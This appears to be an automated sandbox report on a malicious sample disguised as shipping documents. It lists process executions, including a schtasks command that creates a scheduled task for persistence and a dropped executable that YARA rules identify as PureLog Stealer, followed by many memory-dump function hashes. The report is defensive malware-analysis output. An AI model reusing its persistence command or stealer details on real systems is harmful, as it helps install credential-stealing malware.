Imagebase:	0xe80000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:08:01
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:08:01
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SNgtfGzYQ" /XML "C:\Users\user\AppData\Local\Temp\tmpE1BD.tmp"
Imagebase:	0xf30000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:08:01
Start date:	09/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:08:04
Start date:	09/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:08:04
Start date:	09/01/2025
Path:	C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\SNgtfGzYQ.exe
Imagebase:	0xfd0000
File size:	785'408 bytes
MD5 hash:	0368A9AA7437BAC59B4253ABD5F99818
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2125384122.0000000007850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2122802743.0000000004379000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2122802743.00000000043B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	93.9%
Signature Coverage:	15.3%
Total number of Nodes:	196
Total number of Limit Nodes:	17

Executed Functions

Function 073D8710 Relevance: 8.5, Strings: 6, Instructions: 1029
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 073D9307
\ lw, xrefs: 073D8B19
paq, xrefs: 073D93DE
TJbq, xrefs: 073D88B6
xb`q, xrefs: 073D8840
Te]q, xrefs: 073D8F67

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: 4']q$TJbq$Te]q$\ lw$paq$xb`q
API String ID: 0-2822081767
Opcode ID: db6a2497a9cb48c200845cc2317098082174af518690900e7355a4aeba10dfea
Instruction ID: 1c4631060732d57c4c15f348a32e44137291284e88587873cdadbecd934908f9
Opcode Fuzzy Hash: db6a2497a9cb48c200845cc2317098082174af518690900e7355a4aeba10dfea
Instruction Fuzzy Hash: 74B2B475E00628CFDB65CF69C984AD9BBB2FF89304F1581E5D509AB225DB31AE81CF40

Function 06A9EC70 Relevance: 8.4, Strings: 6, Instructions: 892COMMON

Download Yara Rule

Strings

(o]q, xrefs: 06A9F4D2
,aq, xrefs: 06A9F558
,aq, xrefs: 06A9F54A
(o]q, xrefs: 06A9F4E0
(o]q, xrefs: 06A9F19A
Haq, xrefs: 06A9F066

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$(o]q$,aq$,aq$Haq
API String ID: 0-387163720
Opcode ID: a8bbc1d2c676ef04fafebd8de9964a72a7a74a0f3ffc516f525032b30c5a112f
Instruction ID: af436cd86e4da012a3c6f7aeabd6fc43da1fc17b2337d3e6348d0937a3807f7d
Opcode Fuzzy Hash: a8bbc1d2c676ef04fafebd8de9964a72a7a74a0f3ffc516f525032b30c5a112f
Instruction Fuzzy Hash: 68725C75A002199FDF54DF69C884AAEBBF6BF88300F248459E905EB3A5DB34DD41CB60

Function 073D13E4 Relevance: 6.9, Strings: 5, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Haq, xrefs: 073D208C
Haq, xrefs: 073D225B
Haq, xrefs: 073D219D
Haq, xrefs: 073D1FF9
Haq, xrefs: 073D2113

Memory Dump Source

Source File: 00000000.00000002.4539560556.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Haq$Haq$Haq$Haq$Haq
API String ID: 0-1792267638
Opcode ID: a58f1453187a87f2b1c82cd6ac4d2c99bc7bc878b23a14d001ab8595ae710b1f
Instruction ID: 66a88d6aad82711f05ac15bd8491c356a2bf8ec4f3ae00b8f6fbd92ee7c0ca4b
Opcode Fuzzy Hash: a58f1453187a87f2b1c82cd6ac4d2c99bc7bc878b23a14d001ab8595ae710b1f
Instruction Fuzzy Hash: C3429FB1A002188FEB54DFA9D8907AEBBF6FF88300F1581A9D409AB355DB349D45CF91

Function 0A151D40 Relevance: 6.1, Strings: 4, Instructions: 1135COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0A152478
4']q, xrefs: 0A152A73
4']q, xrefs: 0A151D64
4']q, xrefs: 0A151E6C

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: (o]q$4']q$4']q$4']q
API String ID: 0-875651895
Opcode ID: 701a8d14bbcd890aa0042489edf5ad3e4530421db196becffdfc1f9e8d6cbbb8
Instruction ID: 46d6c25f92bbe35523964308a6ff468bfe6076b4f464b9464d001bf4519a901a
Opcode Fuzzy Hash: 701a8d14bbcd890aa0042489edf5ad3e4530421db196becffdfc1f9e8d6cbbb8
Instruction Fuzzy Hash: 47A28072A00219DFCB15DF68C884AAEBBF6FF88300F158569E865DB351D734E981CB61

Function 044DB4A2 Relevance: 4.9, Strings: 3, Instructions: 1101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{T]n^, xrefs: 044DB943, 044DB948
Te]q, xrefs: 044DBE27
Te]q, xrefs: 044DBE00

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Te]q$Te]q${T]n^
API String ID: 0-719970019
Opcode ID: ffad54a56ee010e3d303017e98abf81248601246d80932831d82b1f180cc8a66
Instruction ID: e8afb3cd0adb3072c2ee3ed22589631a202abcd59fac63d9adacffa1e5dddf95
Opcode Fuzzy Hash: ffad54a56ee010e3d303017e98abf81248601246d80932831d82b1f180cc8a66
Instruction Fuzzy Hash: 6EC29174A01229CFDB65DF24D994BA9BBB2FF49300F1081E9D809AB365DB359E85CF40

Function 0A15C3C5 Relevance: 4.3, Strings: 1, Instructions: 3071COMMON

Download Yara Rule

Strings

N, xrefs: 0A15F7A7

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: N
API String ID: 0-1130791706
Opcode ID: 66bf2a83b3f7f1eaa76ff08cbd964a40f308ea54b4da8bc7317528c1164ad9e2
Instruction ID: b28cb8ce82de0d362fbb7d0cbe4b2615db77910ffa5ce37029516ec093970921
Opcode Fuzzy Hash: 66bf2a83b3f7f1eaa76ff08cbd964a40f308ea54b4da8bc7317528c1164ad9e2
Instruction Fuzzy Hash: B273E431C1075ACECB11EF68C854AA9F7B1FF99300F51D69AE45867221EB70AAD4CF81

Function 044DC9AA Relevance: 3.6, Strings: 2, Instructions: 1108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te]q, xrefs: 044DD35D
{T]n^, xrefs: 044DCE69, 044DCE6E, 044DD1F9, 044DD1FE

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: Te]q${T]n^
API String ID: 0-4030163818
Opcode ID: 1185c0340954c2bc121f5e81125735963b7efff0c44b63e5afb2507c7d24dc86
Instruction ID: 735122e69101ec59f4371cf12d709f80b4b727b097140975b8068ad44026d1ae
Opcode Fuzzy Hash: 1185c0340954c2bc121f5e81125735963b7efff0c44b63e5afb2507c7d24dc86
Instruction Fuzzy Hash: 2CC29174A012298FDB64EF24D994BADBBB2FF49304F1081E9D809A7365DB359E81CF50

Function 04460D9E Relevance: 3.6, Strings: 1, Instructions: 2331COMMON

Download Yara Rule

Strings

K, xrefs: 0446356B

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-856455061
Opcode ID: 02a9109d1dfb87c10deffdfbf70f347a3c1e65c62fa6cdbe67b4e0be942e68e7
Instruction ID: a93d614398fbeb5f16260e9b7c9ef61060b07583fc166e3ae3165afb3db063ef
Opcode Fuzzy Hash: 02a9109d1dfb87c10deffdfbf70f347a3c1e65c62fa6cdbe67b4e0be942e68e7
Instruction Fuzzy Hash: 3543F730C146198EDB11EF68C8946EDFBB1FF99300F50D69AE44967221EB70AAD5CF81

Function 0A1542CC Relevance: 2.9, Strings: 2, Instructions: 375COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A1546DF
PH]q, xrefs: 0A1546F0

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: c6d1c591c84d51be3d9985f5f88c356bd3cc5dd123ee6bb1d0de1edc31c139d5
Instruction ID: 894fd5da30afc885cf03153df45544da57ae26c937a2f3557a4361829ee043bd
Opcode Fuzzy Hash: c6d1c591c84d51be3d9985f5f88c356bd3cc5dd123ee6bb1d0de1edc31c139d5
Instruction Fuzzy Hash: E561B974E00608DFDB58DFAAD944A9DBBF2BF89300F14C069E819AB355DB345985CF50

Function 0446F3C8 Relevance: 2.8, Strings: 2, Instructions: 270COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0446F71B
PH]q, xrefs: 0446F70A

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 024c3de71aefc38ecae5def3db386bf5b2c7294844ea181d825d867d7db11893
Instruction ID: 6cd8906e5aa7101d3c2fe438828fffabc4a67054f30ab4955311c7693990fd93
Opcode Fuzzy Hash: 024c3de71aefc38ecae5def3db386bf5b2c7294844ea181d825d867d7db11893
Instruction Fuzzy Hash: D9A13D70D042588FDB14DFA9D8907DEBBB2FF89304F20906AD88AAB255EB345947CF51

Function 0A153D60 Relevance: 2.7, Strings: 2, Instructions: 222COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A154018
PH]q, xrefs: 0A154007

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 502607d62ccd1fe553b3cc17f7dd002b12a7d9e7b4b8c035aae197f212b4124a
Instruction ID: c396c5315b9f38f552323cc7429aa823b70f917b93bab21ef7177ff290963be7
Opcode Fuzzy Hash: 502607d62ccd1fe553b3cc17f7dd002b12a7d9e7b4b8c035aae197f212b4124a
Instruction Fuzzy Hash: CEA1F474E00618DFDB18DFA9D994A9DBBF2FF89300F15806AE819AB365DB309841CF51

Function 06A9D22A Relevance: 2.7, Strings: 2, Instructions: 196COMMON

Download Yara Rule

Strings

PH]q, xrefs: 06A9D491
PH]q, xrefs: 06A9D480

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 7ce365c6c54f5a61f8e4d0b5b2802fd866213970f1a9e07582883c2638bf809f
Instruction ID: f5d9bfac4e56e1589157df94da271af74c00c0cbfaac78007fccf95a0f4dd044
Opcode Fuzzy Hash: 7ce365c6c54f5a61f8e4d0b5b2802fd866213970f1a9e07582883c2638bf809f
Instruction Fuzzy Hash: ED91A574E00618CFDB54EFA9D944A9DBBF2FF89301F248069E419AB365DB349981CF60

Function 0A154A38 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A154C7F
PH]q, xrefs: 0A154C90

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 99dad112711b42df24f153d90a51800c67a2c1200b36b07d6799d0f83d03f45d
Instruction ID: 3c13f93a4f1b8ab3b52630704bc97cf438ae3d06b59b35d6951afcc6f4ff80b4
Opcode Fuzzy Hash: 99dad112711b42df24f153d90a51800c67a2c1200b36b07d6799d0f83d03f45d
Instruction Fuzzy Hash: 5F81A774E00218CFDB58DFA9D984A9DBBF2BF89300F14D069E819AB365DB349985CF50

Function 0A1552A8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A1554EF
PH]q, xrefs: 0A155500

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: fe62e677d071f354b0192d19f1e35a76d4cd270a8ad0b2de7dcc76721890225e
Instruction ID: db3899db77622b701f76a25e7bb5b5819e42e8475f12c8c0c39e3700c1da8e42
Opcode Fuzzy Hash: fe62e677d071f354b0192d19f1e35a76d4cd270a8ad0b2de7dcc76721890225e
Instruction Fuzzy Hash: 8B81B374E00218DFDB58DFAAD984A9DBBF2BF88310F14C069E819AB365DB349941CF50

Function 0A154768 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A1549C0
PH]q, xrefs: 0A1549AF

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 68eccf629dd6a46e671419209ccc9f5f076448903c82cc75410ee68e1c4f7deb
Instruction ID: 52e5b69e5e9de68251fdb35163a97b0bf00fca54b839e046052e998bd68106a9
Opcode Fuzzy Hash: 68eccf629dd6a46e671419209ccc9f5f076448903c82cc75410ee68e1c4f7deb
Instruction Fuzzy Hash: 3B81A674E00258DFDB58DFA9D944A9DBBF2BF89310F14C069E819AB365DB309981CF50

Function 0A154FD8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A15521F
PH]q, xrefs: 0A155230

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 4581693126580a47d3d5f8dccea62392912d126208def71dee8589f17b6d9c0e
Instruction ID: d8d76b4dda800b3d34208d62c2feb538134393d9c4edf87cc83a99c7c9e02166
Opcode Fuzzy Hash: 4581693126580a47d3d5f8dccea62392912d126208def71dee8589f17b6d9c0e
Instruction Fuzzy Hash: DB819374E00218DFDB58DFAAD984A9DBBF2BF89310F14C069E819AB365DB349941CF50

Function 0A154498 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A1546DF
PH]q, xrefs: 0A1546F0

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 1029b38feb156c2b78cc16d85b9718f37cf17994bd624453135e84aa6eac85a2
Instruction ID: 335ae1b92f457141db86fbba9582dc0c0863254132371dc7ae1513484f79c7be
Opcode Fuzzy Hash: 1029b38feb156c2b78cc16d85b9718f37cf17994bd624453135e84aa6eac85a2
Instruction Fuzzy Hash: 9981B774E00218DFDB58DFA9D944A9DBBF2BF88300F14C069E819AB365DB349981CF50

Function 0A154D08 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A154F4F
PH]q, xrefs: 0A154F60

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 4b3179213f2fe28563ce968bf338affdd07186acf93d840120168a1d6197aca1
Instruction ID: db0f86185ff0e75e95ca32fe0b62cda22911e52f2a73f9ce2d1cf38c250c2ad0
Opcode Fuzzy Hash: 4b3179213f2fe28563ce968bf338affdd07186acf93d840120168a1d6197aca1
Instruction Fuzzy Hash: 2A81A474E00258DFDB58DFAAD944A9DBBF2FF88300F148069E819AB365DB349981CF54

Function 0A154FC8 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A15521F
PH]q, xrefs: 0A155230

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 04f769a82230a2d0abcf02f3634f0e1fb410f570f27903bcca06ec2c501cc243
Instruction ID: 6d254f32cea99d6a7cbe89650e37772eac870c17fcaf8c0b1bfb590d8bccfad4
Opcode Fuzzy Hash: 04f769a82230a2d0abcf02f3634f0e1fb410f570f27903bcca06ec2c501cc243
Instruction Fuzzy Hash: 6861A274E00208DFDB58DFAAD984A9DBBF2BF88310F14C069E819AB365DB359945CF50

Function 0A154CF7 Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A154F4F
PH]q, xrefs: 0A154F60

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: bf9999bbdd7cff6ce4612960701427ed04e51c686d036906b7d119bfb54487ac
Instruction ID: 2f8f9a8b805b1f84bcdb70035573a6bf117d1d88270250c85ba96474512efaac
Opcode Fuzzy Hash: bf9999bbdd7cff6ce4612960701427ed04e51c686d036906b7d119bfb54487ac
Instruction Fuzzy Hash: 7761A574E00208DFDB58DFAAD984A9DFBF2BF88300F148069E819AB365DB349945CF54

Function 0A154A28 Relevance: 2.7, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A154C7F
PH]q, xrefs: 0A154C90

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 35991a85e70b0b9b758ea8223b3d0b6f5d43a40900916dbbb15d2f14f70a4106
Instruction ID: 8df2d4753b20052db0d3e67bbe671f006a2a2e5afd9760e7bdaf5b37969c4052
Opcode Fuzzy Hash: 35991a85e70b0b9b758ea8223b3d0b6f5d43a40900916dbbb15d2f14f70a4106
Instruction Fuzzy Hash: 9C61A674E00608DFDB58DFAAD984A9DBBF2BF89300F14C069E815AB365DB349985CF50

Function 0A15529A Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A1554EF
PH]q, xrefs: 0A155500

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 17ee011415a091b78d4467f3fe96a2b2b69b4920b0ed7ce53456415906ffb137
Instruction ID: 5c3652ec2d0e156d9dd0b4798b23a924bc726789d95abba7a4577abc8dc3677a
Opcode Fuzzy Hash: 17ee011415a091b78d4467f3fe96a2b2b69b4920b0ed7ce53456415906ffb137
Instruction Fuzzy Hash: F361B574E00608DFDB58DFAAD984A9DBBF2BF89310F14C069E819AB365DB349941CF50

Function 0A154762 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

PH]q, xrefs: 0A1549C0
PH]q, xrefs: 0A1549AF

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID: PH]q$PH]q
API String ID: 0-1166926398
Opcode ID: 451b7fd9b617ab75a1adf0eb08da72ea0b457129dd343a5c465ba0ac00db4d78
Instruction ID: dc4e548624ecf7d41e734741adb5ebb9be861e614739cd3cebc84152a0c54b73
Opcode Fuzzy Hash: 451b7fd9b617ab75a1adf0eb08da72ea0b457129dd343a5c465ba0ac00db4d78
Instruction Fuzzy Hash: 2861A474E00258DFDB58DFAAD984A9DBBF2BF88300F14C069E819AB365DB349945CF50

Function 044607C8 Relevance: 1.9, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12d64c6ce451d61be9e00a51c591c6966065a7b3f0652be8845615f9797bc45
Instruction ID: ad05d49deeaf193a20d5caeb6716c3018690e7842f581dc4f57eac2e2ffbf7f3
Opcode Fuzzy Hash: d12d64c6ce451d61be9e00a51c591c6966065a7b3f0652be8845615f9797bc45
Instruction Fuzzy Hash: 72F1F474E01218CFDB14DFA9D884B9DBBB2BF88304F54C1AAE409AB355DB70A985CF51

Function 044D4798 Relevance: .7, Instructions: 745COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1d97f5e8b7289aee67c872dd10d27fb11a67b272aec0932898ee622a8e5a7ed
Instruction ID: f101e64f72e4dcede1c511ce7a5142d5863ae5cdbbbb23bd4174ddbfadd12dbc
Opcode Fuzzy Hash: e1d97f5e8b7289aee67c872dd10d27fb11a67b272aec0932898ee622a8e5a7ed
Instruction Fuzzy Hash: 8B827B74E012289FDB64DF69CD94B9DBBB2BF89300F1081EA944DA7265DB309E81CF41

Function 0A157FE1 Relevance: .7, Instructions: 716COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5632f9a49a8209c2ec316b79fa1392b428d4c389507c149c710e34ed7a73e9
Instruction ID: a76d87bd7f47e9616ee73a1e2ce671fd6a12fcdea8f586471c3b6fc077bfc9f8
Opcode Fuzzy Hash: bb5632f9a49a8209c2ec316b79fa1392b428d4c389507c149c710e34ed7a73e9
Instruction Fuzzy Hash: A172CD74E01228CFDB65DF69C984BD9BBB2BB49300F1481E9D819A7356EB349E81CF50

Function 0446EE78 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535347905.0000000004460000.00000040.00000800.00020000.00000000.sdmp, Offset: 04460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4460000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a27189615a2d5f62bc2df8227b21760737c346960fa506f31a32691fb2cfd82a
Instruction ID: 274755e77885bb8852199963839cd25d32390013312554cfce0b935e28fc0dd0
Opcode Fuzzy Hash: a27189615a2d5f62bc2df8227b21760737c346960fa506f31a32691fb2cfd82a
Instruction Fuzzy Hash: EFE1D274E01218CFEB54DFA5D944B9DBBF2BF89304F2080AAD809AB355DB359A85CF11

Function 073D13DC Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

